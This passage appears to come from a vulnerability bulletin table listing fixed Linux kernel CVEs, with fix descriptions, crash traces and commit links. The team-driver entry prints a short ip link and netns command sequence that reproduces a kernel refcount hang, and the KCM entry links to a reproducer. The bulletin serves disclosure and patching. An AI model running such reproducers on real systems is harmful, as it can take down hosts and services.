https://git.kernel.org/stable/c/a8333c8262aed2aedf608c18edd39cf5342680a7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/zcrx: fix sgtable leak on mapping failures In an unlikely case when io_populate_area_dma() fails, which could only happen on a PAGE_POOL_32BIT_ARCH_WITH_64BIT_DMA machine, io_zcrx_map_area() will have an initialised and not freed table. It was supposed to be cleaned up in the error path, but !is_mapped prevents that. | 2026-05-06 | not yet calculated | CVE-2026-43224 | https://git.kernel.org/stable/c/f1ae403324311e143ef20e53cf9a5f01e312f7c9 https://git.kernel.org/stable/c/ef075c1464ac9047e2cf7d23cb020bfd0b8e4b60 https://git.kernel.org/stable/c/a983aae397767e9da931128ff2b5bf9066513ce3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: staging: rtl8723bs: fix memory leak on failure path cfg80211_inform_bss_frame() may return NULL on failure. In that case, the allocated buffer 'buf' is not freed and the function returns early, leading to potential memory leak. Fix this by ensuring that 'buf' is freed on both success and failure paths. | 2026-05-06 | not yet calculated | CVE-2026-43225 | https://git.kernel.org/stable/c/9874e33ce52ba449ab0ade78752a2d37a2294617 https://git.kernel.org/stable/c/a968c6a39607c129b8ac2c3c2a5e8923574e90d0 https://git.kernel.org/stable/c/8311bb40698ba027649d5d1ca84ad4bf25270546 https://git.kernel.org/stable/c/9f70f78e22b321429afc77befecedf05543d4e2c https://git.kernel.org/stable/c/af48c1a0abe849e167fc754b6c260b6d8350b6fd https://git.kernel.org/stable/c/017295b17bf1f477246c95bd253a7ef0cb4684c9 https://git.kernel.org/stable/c/abe850d82c8cb72d28700673678724e779b1826e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clocksource/drivers/sh_tmu: Always leave device running after probe The TMU device can be used as both a clocksource and a clockevent provider. The driver tries to be smart and power itself on and off, as well as enabling and disabling its clock when it's not in operation. This behavior is slightly altered if the TMU is used as an early platform device in which case the device is left powered on after probe, but the clock is still enabled and disabled at runtime. This has worked for a long time, but recent improvements in PREEMPT_RT and PROVE_LOCKING have highlighted an issue. As the TMU registers itself as a clockevent provider, clockevents_register_device(), it needs to use raw spinlocks internally as this is the context of which the clockevent framework interacts with the TMU driver. However in the context of holding a raw spinlock the TMU driver can't really manage its power state or clock with calls to pm_runtime_*() and clk_*() as these calls end up in other platform drivers using regular spinlocks to control power and clocks. This mix of spinlock contexts trips a lockdep warning. ============================= [ BUG: Invalid wait context ] 6.18.0-arm64-renesas-09926-gee959e7c5e34 #1 Not tainted ----------------------------- swapper/0/0 is trying to lock: ffff000008c9e180 (&dev->power.lock){-...}-{3:3}, at: __pm_runtime_resume+0x38/0x88 other info that might help us debug this: context-{5:5} 1 lock held by swapper/0/0: ccree e6601000.crypto: ARM CryptoCell 630P Driver: HW version 0xAF400001/0xDCC63000, Driver version 5.0 #0: ffff8000817ec298 ccree e6601000.crypto: ARM ccree device initialized (tick_broadcast_lock){-...}-{2:2}, at: __tick_broadcast_oneshot_control+0xa4/0x3a8 stack backtrace: CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.18.0-arm64-renesas-09926-gee959e7c5e34 #1 PREEMPT Hardware name: Renesas Salvator-X 2nd version board based on r8a77965 (DT) Call trace: show_stack+0x14/0x1c (C) dump_stack_lvl+0x6c/0x90 dump_stack+0x14/0x1c __lock_acquire+0x904/0x1584 lock_acquire+0x220/0x34c _raw_spin_lock_irqsave+0x58/0x80 __pm_runtime_resume+0x38/0x88 sh_tmu_clock_event_set_oneshot+0x84/0xd4 clockevents_switch_state+0xfc/0x13c tick_broadcast_set_event+0x30/0xa4 __tick_broadcast_oneshot_control+0x1e0/0x3a8 tick_broadcast_oneshot_control+0x30/0x40 cpuidle_enter_state+0x40c/0x680 cpuidle_enter+0x30/0x40 do_idle+0x1f4/0x280 cpu_startup_entry+0x34/0x40 kernel_init+0x0/0x130 do_one_initcall+0x0/0x230 __primary_switched+0x88/0x90 For non-PREEMPT_RT builds this is not really an issue, but for PREEMPT_RT builds where normal spinlocks can sleep this might be an issue. Be cautious and always leave the power and clock running after probe. | 2026-05-06 | not yet calculated | CVE-2026-43227 | https://git.kernel.org/stable/c/79d650695773f03de36b99228a090d33d1c18264 https://git.kernel.org/stable/c/f0b31247e7d67a943b3a09d3cef7c0ae788d88e6 https://git.kernel.org/stable/c/016476afef993d1201a19decc9b5b2ea1e6620f2 https://git.kernel.org/stable/c/6f113ab549b864c1bc57d4f89846ee335394089a https://git.kernel.org/stable/c/88c76792180dffd83f1c5b9dc8fdaeb145cb94e0 https://git.kernel.org/stable/c/bc59d5f3afe41fec5d673c27c703b761ae578d28 https://git.kernel.org/stable/c/0e513cc6b9cea190fe342cc222b1054e7e8acfc8 https://git.kernel.org/stable/c/b1278972b08e480990e2789bdc6a7c918bc349be |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfs: Replace BUG_ON with error handling for CNID count checks In a06ec283e125 next_id, folder_count, and file_count in the super block info were expanded to 64 bits, and BUG_ONs were added to detect overflow. This triggered an error reported by syzbot: if the MDB is corrupted, the BUG_ON is triggered. This patch replaces this mechanism with proper error handling and resolves the syzbot reported bug. Signed-off-by: Jori Koolstra <jkoolstra@xs4all.nl> | 2026-05-06 | not yet calculated | CVE-2026-43228 | https://git.kernel.org/stable/c/b6536c1ced315fa645576d3a39c6e07f2a472962 https://git.kernel.org/stable/c/b226804532a875c10276168dc55ce752944096bd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: chips-media: wave5: Fix device cleanup order to prevent kernel panic Move video device unregistration to the beginning of the remove function to ensure all video operations are stopped before cleaning up the worker thread and disabling PM runtime. This prevents hardware register access after the device has been powered down. In polling mode, the hrtimer periodically triggers wave5_vpu_timer_callback() which queues work to the kthread worker. The worker executes wave5_vpu_irq_work_fn() which reads hardware registers via wave5_vdi_read_register(). The original cleanup order disabled PM runtime and powered down hardware before unregistering video devices. When autosuspend triggers and powers off the hardware, the video devices are still registered and the worker thread can still be triggered by the hrtimer, causing it to attempt reading registers from powered-off hardware. This results in a bus error (synchronous external abort) and kernel panic. This causes random kernel panics during encoding operations: Internal error: synchronous external abort: 0000000096000010 [#1] PREEMPT SMP Modules linked in: wave5 rpmsg_ctrl rpmsg_char ... CPU: 0 UID: 0 PID: 1520 Comm: vpu_irq_thread Tainted: G M W pc : wave5_vdi_read_register+0x10/0x38 [wave5] lr : wave5_vpu_irq_work_fn+0x28/0x60 [wave5] Call trace: wave5_vdi_read_register+0x10/0x38 [wave5] kthread_worker_fn+0xd8/0x238 kthread+0x104/0x120 ret_from_fork+0x10/0x20 Code: aa1e03e9 d503201f f9416800 8b214000 (b9400000) ---[ end trace 0000000000000000 ]--- Kernel panic - not syncing: synchronous external abort: Fatal exception | 2026-05-06 | not yet calculated | CVE-2026-43229 | https://git.kernel.org/stable/c/b73d85231d5b1400a4fa5046cdac6c4d7cc6d969 https://git.kernel.org/stable/c/526816f2e331954d80fed8b37fa94efbbdde2b8d https://git.kernel.org/stable/c/dc2b7deae740a3ed138fb7ae17c97fa4055cfc5f https://git.kernel.org/stable/c/b74cedac643b02aefa7da881b58a3792859d9748 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: radio-keene: fix memory leak in error path Fix a memory leak in usb_keene_probe(). The v4l2 control handler is initialized and controls are added, but if v4l2_device_register() or video_register_device() fails afterward, the handler was never freed, leaking memory. Add v4l2_ctrl_handler_free() call in the err_v4l2 error path to ensure the control handler is properly freed for all error paths after it is initialized. | 2026-05-06 | not yet calculated | CVE-2026-43231 | https://git.kernel.org/stable/c/ad85bb5623079a35bd400f51de2e2fbc2170bdb2 https://git.kernel.org/stable/c/242b0aabb1866024a7995a767ac330c158b39aa4 https://git.kernel.org/stable/c/2fe28a63d598235595a9601e0d8fdc7c8f4fd575 https://git.kernel.org/stable/c/27c508f61963013fdf29097578284099ee7a85a4 https://git.kernel.org/stable/c/7fa9754f48cb8eefa566156be341e63d313247e5 https://git.kernel.org/stable/c/1d8558a232ecb187e8e0328d6347a125f437a0fc https://git.kernel.org/stable/c/de204d87e7d61859937272fe30cbdd46a4cfb10a https://git.kernel.org/stable/c/b8bf939d77c0cd01118e953bbf554e0fa15e9006 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: team: avoid NETDEV_CHANGEMTU event when unregistering slave syzbot is reporting unregister_netdevice: waiting for netdevsim0 to become free. Usage count = 3 ref_tracker: netdev@ffff88807dcf8618 has 1/2 users at __netdev_tracker_alloc include/linux/netdevice.h:4400 [inline] netdev_hold include/linux/netdevice.h:4429 [inline] inetdev_init+0x201/0x4e0 net/ipv4/devinet.c:286 inetdev_event+0x251/0x1610 net/ipv4/devinet.c:1600 notifier_call_chain+0x19d/0x3a0 kernel/notifier.c:85 call_netdevice_notifiers_mtu net/core/dev.c:2318 [inline] netif_set_mtu_ext+0x5aa/0x800 net/core/dev.c:9886 netif_set_mtu+0xd7/0x1b0 net/core/dev.c:9907 dev_set_mtu+0x126/0x260 net/core/dev_api.c:248 team_port_del+0xb07/0xcb0 drivers/net/team/team_core.c:1333 team_del_slave drivers/net/team/team_core.c:1936 [inline] team_device_event+0x207/0x5b0 drivers/net/team/team_core.c:2929 notifier_call_chain+0x19d/0x3a0 kernel/notifier.c:85 call_netdevice_notifiers_extack net/core/dev.c:2281 [inline] call_netdevice_notifiers net/core/dev.c:2295 [inline] __dev_change_net_namespace+0xcb7/0x2050 net/core/dev.c:12592 do_setlink+0x2ce/0x4590 net/core/rtnetlink.c:3060 rtnl_changelink net/core/rtnetlink.c:3776 [inline] __rtnl_newlink net/core/rtnetlink.c:3935 [inline] rtnl_newlink+0x15a9/0x1be0 net/core/rtnetlink.c:4072 rtnetlink_rcv_msg+0x7d5/0xbe0 net/core/rtnetlink.c:6958 netlink_rcv_skb+0x232/0x4b0 net/netlink/af_netlink.c:2550 netlink_unicast_kernel net/netlink/af_netlink.c:1318 [inline] netlink_unicast+0x80f/0x9b0 net/netlink/af_netlink.c:1344 netlink_sendmsg+0x813/0xb40 net/netlink/af_netlink.c:1894 problem. Ido Schimmel found steps to reproduce: ip link add name team1 type team; ip link add name dummy1 mtu 1499 master team1 type dummy; ip netns add ns1; ip link set dev dummy1 netns ns1; ip -n ns1 link del dev dummy1; and also found that the same issue was fixed in the bond driver in commit f51048c3e07b ("bonding: avoid NETDEV_CHANGEMTU event when unregistering slave"). Let's do a similar thing for the team driver, with commit ad7c7b2172c3 ("net: hold netdev instance lock during sysfs operations") and commit 303a8487a657 ("net: s/__dev_set_mtu/__netif_set_mtu/") also applied. | 2026-05-06 | not yet calculated | CVE-2026-43234 | https://git.kernel.org/stable/c/bce42728ac4887060a24a585c5122fbd24939db7 https://git.kernel.org/stable/c/5268892de70f0b29bde341db863b234aa9259c08 https://git.kernel.org/stable/c/bb4c698633c0e19717586a6524a33196cff01a32 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: iris: Add missing platform data entries for SM8750 Two platform-data fields for SM8750 were missed: - get_vpu_buffer_size = iris_vpu33_buf_size Without this, the driver fails to allocate the required internal buffers, leading to basic decode/encode failures during session bring-up. - max_core_mbps = ((7680 * 4320) / 256) * 60 Without this capability exposed, capability checks are incomplete and v4l2-compliance for encoder fails. | 2026-05-06 | not yet calculated | CVE-2026-43235 | https://git.kernel.org/stable/c/1aa5833f29b88c16e9ad49a1782927754f3af742 https://git.kernel.org/stable/c/c7b2105a1cad1737eb877cdb4865618927623dd4 https://git.kernel.org/stable/c/bbef55f414100853d5bcea56a41f8b171bac8fcb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: act_skbedit: fix divide-by-zero in tcf_skbedit_hash() Commit 38a6f0865796 ("net: sched: support hash selecting tx queue") added SKBEDIT_F_TXQ_SKBHASH support. The inclusive range size is computed as: mapping_mod = queue_mapping_max - queue_mapping + 1; The range size can be 65536 when the requested range covers all possible u16 queue IDs (e.g. queue_mapping=0 and queue_mapping_max=U16_MAX). That value cannot be represented in a u16 and previously wrapped to 0, so tcf_skbedit_hash() could trigger a divide-by-zero: queue_mapping += skb_get_hash(skb) % params->mapping_mod; Compute mapping_mod in a wider type and reject ranges larger than U16_MAX to prevent params->mapping_mod from becoming 0 and avoid the crash. | 2026-05-06 | not yet calculated | CVE-2026-43238 | https://git.kernel.org/stable/c/59809fda4da7730cfe84a948033f47eb45db073d https://git.kernel.org/stable/c/9c735a7d98c982a786b0db71eb6566ee00aaa04f https://git.kernel.org/stable/c/015cebdfcb97b5347fb7f598ea712a281cb35840 https://git.kernel.org/stable/c/4ece5eb4836f8ff03b9004dc2430a7169f282851 https://git.kernel.org/stable/c/3c2b95b26860bd6f8e2310d31ea1200d3f8f173e https://git.kernel.org/stable/c/be054cc66f739a9ba615dba9012a07fab8e7dd6f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: x86/kexec: add a sanity check on previous kernel's ima kexec buffer When the second-stage kernel is booted via kexec with a limiting command line such as "mem=<size>", the physical range that contains the carried over IMA measurement list may fall outside the truncated RAM, leading to a kernel panic. BUG: unable to handle page fault for address: ffff97793ff47000 RIP: ima_restore_measurement_list+0xdc/0x45a #PF: error_code(0x0000) - not-present page Other architectures already validate the range with page_is_ram(), as done in commit cbf9c4b9617b ("of: check previous kernel's ima-kexec-buffer against memory bounds"); do a similar check on x86. Without carrying the measurement list across kexec, the attestation would fail. | 2026-05-06 | not yet calculated | CVE-2026-43240 | https://git.kernel.org/stable/c/37f18915a261afe84dab462624ed829cddb77a9b https://git.kernel.org/stable/c/22e460b6333a5f818b042ac89201f8e735556f4a https://git.kernel.org/stable/c/f8f73bf0f8a57ee9b86792456bd42079bc98c6b7 https://git.kernel.org/stable/c/d4a132f121c591b60dbaf57ea91f1faf11631fbc https://git.kernel.org/stable/c/4d7a8f5f28187e3d2958b2a134473da2665207e7 https://git.kernel.org/stable/c/c5489d04337b47e93c0623e8145fcba3f5739efd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ntb: ntb_hw_switchtec: Fix array-index-out-of-bounds access The number of MW LUTs depends on the NTB configuration and can be set to MAX_MWS. This patch protects against invalid out-of-bounds index access to mw_sizes. When an invalid access occurs, print a message to the user that the configuration is not valid. | 2026-05-06 | not yet calculated | CVE-2026-43241 | https://git.kernel.org/stable/c/348e1ac9ad983ed7e62de14e1daf47f1695a4ce9 https://git.kernel.org/stable/c/ee02c4f980c91820845dd8e469ec7dc670ab6d9d https://git.kernel.org/stable/c/740945de896021b9a859e71f38f6aea72a6393cf https://git.kernel.org/stable/c/85c9daa1f8319bbb3dfee71dc6a2f969cd3b4c92 https://git.kernel.org/stable/c/0e930420945106151c6eb3d7837b4e6154e9b144 https://git.kernel.org/stable/c/2346856b74823a2a78109002e479a3d02526a9ce https://git.kernel.org/stable/c/47ce292dd45dc689747c40603222691638919189 https://git.kernel.org/stable/c/c8ba7ad2cc1c7b90570aa347b8ebbe279f1eface |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc: ti: k3-socinfo: Fix regmap leak on probe failure The mmio regmap allocated during probe is never freed. Switch to using the device managed allocator so that the regmap is released on probe failures (e.g. probe deferral) and on driver unbind. | 2026-05-06 | not yet calculated | CVE-2026-43242 | https://git.kernel.org/stable/c/c97c21d342838b2a7787b0f1d6ad417e85c906f6 https://git.kernel.org/stable/c/b1006b5892ec8a95d039a89b47e6fd69cf607405 https://git.kernel.org/stable/c/458136527fe127fd051c1c9537f4540849780d70 https://git.kernel.org/stable/c/d451bf970a0c54b586f8b3161261bdf35d463c99 https://git.kernel.org/stable/c/eaa16059f9af26d8b8a6f3e887649f58e8ca96c9 https://git.kernel.org/stable/c/ab1ac24c407e4df326d7154a4deadd444e9209d9 https://git.kernel.org/stable/c/bbaa9e615608c204d384a7d4b1a434580a142d4c https://git.kernel.org/stable/c/c933138d45176780fabbbe7da263e04d5b3e525d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: Add signal type check for dcn401 get_phyd32clk_src Trying to access link enc on a dpia link will cause a crash otherwise | 2026-05-06 | not yet calculated | CVE-2026-43243 | https://git.kernel.org/stable/c/23e7150afc70da615857f9f07b494ec58540f096 https://git.kernel.org/stable/c/486b2909ac284185900c06f05ffc6eca895f38b8 https://git.kernel.org/stable/c/e332112255afbce02db67760f5743a1b13aa8541 https://git.kernel.org/stable/c/c979d8db7b0f293111f2e83795ea353c8ed75de9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kcm: fix zero-frag skb in frag_list on partial sendmsg error Syzkaller reported a warning in kcm_write_msgs() when processing a message with a zero-fragment skb in the frag_list. When kcm_sendmsg() fills MAX_SKB_FRAGS fragments in the current skb, it allocates a new skb (tskb) and links it into the frag_list before copying data. If the copy subsequently fails (e.g. -EFAULT from user memory), tskb remains in the frag_list with zero fragments: head skb (msg being assembled, NOT yet in sk_write_queue) +-----------+ \| frags[17] \| (MAX_SKB_FRAGS, all filled with data) \| frag_list-+--> tskb +-----------+ +----------+ \| frags[0] \| (empty! copy failed before filling) +----------+ For SOCK_SEQPACKET with partial data already copied, the error path saves this message via partial_message for later completion. For SOCK_SEQPACKET, sock_write_iter() automatically sets MSG_EOR, so a subsequent zero-length write(fd, NULL, 0) completes the message and queues it to sk_write_queue. kcm_write_msgs() then walks the frag_list and hits: WARN_ON(!skb_shinfo(skb)->nr_frags) TCP has a similar pattern where skbs are enqueued before data copy and cleaned up on failure via tcp_remove_empty_skb(). KCM was missing the equivalent cleanup. Fix this by tracking the predecessor skb (frag_prev) when allocating a new frag_list entry. On error, if the tail skb has zero frags, use frag_prev to unlink and free it in O(1) without walking the singly-linked frag_list. frag_prev is safe to dereference because the entire message chain is only held locally (or in kcm->seq_skb) and is not added to sk_write_queue until MSG_EOR, so the send path cannot free it underneath us. Also change the WARN_ON to WARN_ON_ONCE to avoid flooding the log if the condition is somehow hit repeatedly. There are currently no KCM selftests in the kernel tree; a simple reproducer is available at [1]. [1] https://gist.github.com/mrpre/a94d431c757e8d6f168f4dd1a3749daa | 2026-05-06 | not yet calculated | CVE-2026-43244 | https://git.kernel.org/stable/c/9ea3671d70ee07480d80bebe86696397c4e99fb7 https://git.kernel.org/stable/c/b1e3edf688a88c1a3ac41657055d9c136a08cd25 https://git.kernel.org/stable/c/7af58f76e4b404a74c836881a845e6652db8a09f https://git.kernel.org/stable/c/ca220141fa8ebae09765a242076b2b77338106b0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: i2c/tw9906: Fix potential memory leak in tw9906_probe() In one of the error paths in tw9906_probe(), the memory allocated in v4l2_ctrl_handler_init() and v4l2_ctrl_new_std() is not freed. Fix that by calling v4l2_ctrl_handler_free() on the handler in that error path. | 2026-05-06 | not yet calculated | CVE-2026-43246 | https://git.kernel.org/stable/c/e9a490937942f18205dac7b6b192975ef1369ae1 https://git.kernel.org/stable/c/9548a8bbf511a252a9848f96220c6b95c9a3b918 https://git.kernel.org/stable/c/0c33338514d8246280533a77091e6b6ee548c606 https://git.kernel.org/stable/c/ccb92def042a3636ed47f25a30bd553788e5191e https://git.kernel.org/stable/c/fb09d8b80046216646f1a344410cfa9cfa6c6c7c https://git.kernel.org/stable/c/377a7756914364d72550fc86ca0f404ef1d96141 https://git.kernel.org/stable/c/59420d5d9c46b084e21f9ea6ce79fc79ae9e414c https://git.kernel.org/stable/c/cad237b6c875fbee5d353a2b289e98d240d17ec8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: chips-media: wave5: Fix SError of kernel panic when closed An SError kernel panic rarely happened while testing fluster. The root cause was entering suspend mode because the autosuspend delay timed out. [ 48.834439] SError Interrupt on CPU0, code 0x00000000bf000000 -- SError [ 48.834455] CPU: 0 UID: 0 PID: 1067 Comm: v4l2h265dec0:sr Not tainted 6.12.9-gc9e21a1ebd75-dirty #7 [ 48.834461] Hardware name: ti Texas Instruments J721S2 EVM/Texas Instruments J721S2 EVM, BIOS 2025.01-00345-gbaf3aaa8ecfa 01/01/2025 [ 48.834464] pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 48.834468] pc : wave5_dec_clr_disp_flag+0x40/0x80 [wave5] [ 48.834488] lr : wave5_dec_clr_disp_flag+0x40/0x80 [wave5] [ 48.834495] sp : ffff8000856e3a30 [ 48.834497] x29: ffff8000856e3a30 x28: ffff0008093f6010 x27: ffff000809158130 [ 48.834504] x26: 0000000000000000 x25: ffff00080b625000 x24: ffff000804a9ba80 [ 48.834509] x23: ffff000802343028 x22: ffff000809158150 x21: ffff000802218000 [ 48.834513] x20: ffff0008093f6000 x19: ffff0008093f6000 x18: 0000000000000000 [ 48.834518] x17: 0000000000000000 x16: 0000000000000000 x15: 0000ffff74009618 [ 48.834523] x14: 000000010000000c x13: 0000000000000000 x12: 0000000000000000 [ 48.834527] x11: ffffffffffffffff x10: ffffffffffffffff x9 : ffff000802343028 [ 48.834532] x8 : ffff00080b6252a0 x7 : 0000000000000038 x6 : 0000000000000000 [ 48.834536] x5 : ffff00080b625060 x4 : 0000000000000000 x3 : 0000000000000000 [ 48.834541] x2 : 0000000000000000 x1 : ffff800084bf0118 x0 : ffff800084bf0000 [ 48.834547] Kernel panic - not syncing: Asynchronous SError Interrupt [ 48.834549] CPU: 0 UID: 0 PID: 1067 Comm: v4l2h265dec0:sr Not tainted 6.12.9-gc9e21a1ebd75-dirty #7 [ 48.834554] Hardware name: ti Texas Instruments J721S2 EVM/Texas Instruments J721S2 EVM, BIOS 2025.01-00345-gbaf3aaa8ecfa 01/01/2025 [ 48.834556] Call trace: [ 48.834559] dump_backtrace+0x94/0xec [ 48.834574] show_stack+0x18/0x24 [ 48.834579] dump_stack_lvl+0x38/0x90 [ 48.834585] dump_stack+0x18/0x24 [ 48.834588] panic+0x35c/0x3e0 [ 48.834592] nmi_panic+0x40/0x8c [ 48.834595] arm64_serror_panic+0x64/0x70 [ 48.834598] do_serror+0x3c/0x78 [ 48.834601] el1h_64_error_handler+0x34/0x4c [ 48.834605] el1h_64_error+0x64/0x68 [ 48.834608] wave5_dec_clr_disp_flag+0x40/0x80 [wave5] [ 48.834615] wave5_vpu_dec_clr_disp_flag+0x54/0x80 [wave5] [ 48.834622] wave5_vpu_dec_buf_queue+0x19c/0x1a0 [wave5] [ 48.834628] __enqueue_in_driver+0x3c/0x74 [videobuf2_common] [ 48.834639] vb2_core_qbuf+0x508/0x61c [videobuf2_common] [ 48.834646] vb2_qbuf+0xa4/0x168 [videobuf2_v4l2] [ 48.834656] v4l2_m2m_qbuf+0x80/0x238 [v4l2_mem2mem] [ 48.834666] v4l2_m2m_ioctl_qbuf+0x18/0x24 [v4l2_mem2mem] [ 48.834673] v4l_qbuf+0x48/0x5c [videodev] [ 48.834704] __video_do_ioctl+0x180/0x3f0 [videodev] [ 48.834725] video_usercopy+0x2ec/0x68c [videodev] [ 48.834745] video_ioctl2+0x18/0x24 [videodev] [ 48.834766] v4l2_ioctl+0x40/0x60 [videodev] [ 48.834786] __arm64_sys_ioctl+0xa8/0xec [ 48.834793] invoke_syscall+0x44/0x100 [ 48.834800] el0_svc_common.constprop.0+0xc0/0xe0 [ 48.834804] do_el0_svc+0x1c/0x28 [ 48.834809] el0_svc+0x30/0xd0 [ 48.834813] el0t_64_sync_handler+0xc0/0xc4 [ 48.834816] el0t_64_sync+0x190/0x194 [ 48.834820] SMP: stopping secondary CPUs [ 48.834831] Kernel Offset: disabled [ 48.834833] CPU features: 0x08,00002002,80200000,4200421b [ 48.834837] Memory Limit: none [ 49.161404] ---[ end Kernel panic - not syncing: Asynchronous SError Interrupt ]--- | 2026-05-06 | not yet calculated | CVE-2026-43247 | https://git.kernel.org/stable/c/27cb12b7dc88c51582094eeb2b65b0e94603e411 https://git.kernel.org/stable/c/5da55243fe190c2165ed34e77091a43c0ff74f10 https://git.kernel.org/stable/c/cbb9c0d50e471483cced55f5b7db4569dcd959a6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: chipidea: udc: fix DMA and SG cleanup in _ep_nuke() The ChipIdea UDC driver can encounter "not page aligned sg buffer" errors when a USB device is reconnected after being disconnected during an active transfer. This occurs because _ep_nuke() returns requests to the gadget layer without properly unmapping DMA buffers or cleaning up scatter-gather bounce buffers. Root cause: When a disconnect happens during a multi-segment DMA transfer, the request's num_mapped_sgs field and sgt.sgl pointer remain set with stale values. The request is returned to the gadget driver with status -ESHUTDOWN but still has active DMA state. If the gadget driver reuses this request on reconnect without reinitializing it, the stale DMA state causes _hardware_enqueue() to skip DMA mapping (seeing non-zero num_mapped_sgs) and attempt to use freed/invalid DMA addresses, leading to alignment errors and potential memory corruption. The normal completion path via _hardware_dequeue() properly calls usb_gadget_unmap_request_by_dev() and sglist_do_debounce() before returning the request. The _ep_nuke() path must do the same cleanup to ensure requests are returned in a clean, reusable state. Fix: Add DMA unmapping and bounce buffer cleanup to _ep_nuke() to mirror the cleanup sequence in _hardware_dequeue(): - Call usb_gadget_unmap_request_by_dev() if num_mapped_sgs is set - Call sglist_do_debounce() with copy=false if bounce buffer exists This ensures that when requests are returned due to endpoint shutdown, they don't retain stale DMA mappings. The 'false' parameter to sglist_do_debounce() prevents copying data back (appropriate for shutdown path where transfer was aborted). | 2026-05-06 | not yet calculated | CVE-2026-43250 | https://git.kernel.org/stable/c/1b72b834511d17f4d069d512f78671f3f210a2f1 https://git.kernel.org/stable/c/f4fbf2d4750d12ac8525d2efac1016fa0d84d4ec https://git.kernel.org/stable/c/e74c436f8568af1c60942469d0a2300b3ada3857 https://git.kernel.org/stable/c/cea2a1257a3b5ea3e769a445b34af13e6aa5a123 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: prodikeys: Check presence of pm->input_ep82 Fake USB devices can send their own report descriptors for which the input_mapping() hook does not get called. In this case, pm->input_ep82 stays NULL, which leads to a crash later. This does not happen with the real device, but can be provoked by imposing as one. | 2026-05-06 | not yet calculated | CVE-2026-43251 | https://git.kernel.org/stable/c/f580c79683356632f12f2c2029f2fe936d953aa1 https://git.kernel.org/stable/c/ee572578f09f0e743e9383393a75c3a7a0f9b4c2 https://git.kernel.org/stable/c/edccbf7d6dc05d692bde3a89de5a4001f72a0fa4 https://git.kernel.org/stable/c/3f1b21cc67a15d7d081378a9b8747dd000a017b8 https://git.kernel.org/stable/c/e7ac1cd823cd2e9fcbd5cb0b261d6d35dbb79341 https://git.kernel.org/stable/c/d5512ce892f774d37c53082adadfcad04f21b50e https://git.kernel.org/stable/c/d08f35f843881ec504d7537a9bb728a073db3366 https://git.kernel.org/stable/c/cee8337e1bad168136aecfe6416ecd7d3aa7529a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: pm: in-kernel: always set ID as avail when rm endp Syzkaller managed to find a combination of actions that was generating this warning: WARNING: net/mptcp/pm_kernel.c:1074 at __mark_subflow_endp_available net/mptcp/pm_kernel.c:1074 [inline], CPU#1: syz.7.48/2535 WARNING: net/mptcp/pm_kernel.c:1074 at mptcp_pm_nl_fullmesh net/mptcp/pm_kernel.c:1446 [inline], CPU#1: syz.7.48/2535 WARNING: net/mptcp/pm_kernel.c:1074 at mptcp_pm_nl_set_flags_all net/mptcp/pm_kernel.c:1474 [inline], CPU#1: syz.7.48/2535 WARNING: net/mptcp/pm_kernel.c:1074 at mptcp_pm_nl_set_flags+0x5de/0x640 net/mptcp/pm_kernel.c:1538, CPU#1: syz.7.48/2535 Modules linked in: CPU: 1 UID: 0 PID: 2535 Comm: syz.7.48 Not tainted 6.18.0-03987-gea5f5e676cf5 #17 PREEMPT(voluntary) Hardware name: QEMU Ubuntu 25.10 PC (i440FX + PIIX, 1996), BIOS 1.17.0-debian-1.17.0-1 04/01/2014 RIP: 0010:__mark_subflow_endp_available net/mptcp/pm_kernel.c:1074 [inline] RIP: 0010:mptcp_pm_nl_fullmesh net/mptcp/pm_kernel.c:1446 [inline] RIP: 0010:mptcp_pm_nl_set_flags_all net/mptcp/pm_kernel.c:1474 [inline] RIP: 0010:mptcp_pm_nl_set_flags+0x5de/0x640 net/mptcp/pm_kernel.c:1538 Code: 89 c7 e8 c5 8c 73 fe e9 f7 fd ff ff 49 83 ef 80 e8 b7 8c 73 fe 4c 89 ff be 03 00 00 00 e8 4a 29 e3 fe eb ac e8 a3 8c 73 fe 90 <0f> 0b 90 e9 3d ff ff ff e8 95 8c 73 fe b8 a1 ff ff ff eb 1a e8 89 RSP: 0018:ffffc9001535b820 EFLAGS: 00010287 netdevsim0: tun_chr_ioctl cmd 1074025677 RAX: ffffffff82da294d RBX: 0000000000000001 RCX: 0000000000080000 RDX: ffffc900096d0000 RSI: 00000000000006d6 RDI: 00000000000006d7 netdevsim0: linktype set to 823 RBP: ffff88802cdb2240 R08: 00000000000104ae R09: ffffffffffffffff R10: ffffffff82da27d4 R11: 0000000000000000 R12: 0000000000000000 R13: ffff88801246d8c0 R14: ffffc9001535b8b8 R15: ffff88802cdb1800 FS: 00007fc6ac5a76c0(0000) GS:ffff8880f90c8000(0000) knlGS:0000000000000000 netlink: 'syz.3.50': attribute type 5 has an invalid length. CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 netlink: 1232 bytes leftover after parsing attributes in process `syz.3.50'. CR2: 0000200000010000 CR3: 0000000025b1a000 CR4: 0000000000350ef0 Call Trace: <TASK> mptcp_pm_set_flags net/mptcp/pm_netlink.c:277 [inline] mptcp_pm_nl_set_flags_doit+0x1d7/0x210 net/mptcp/pm_netlink.c:282 genl_family_rcv_msg_doit+0x117/0x180 net/netlink/genetlink.c:1115 genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline] genl_rcv_msg+0x3a8/0x3f0 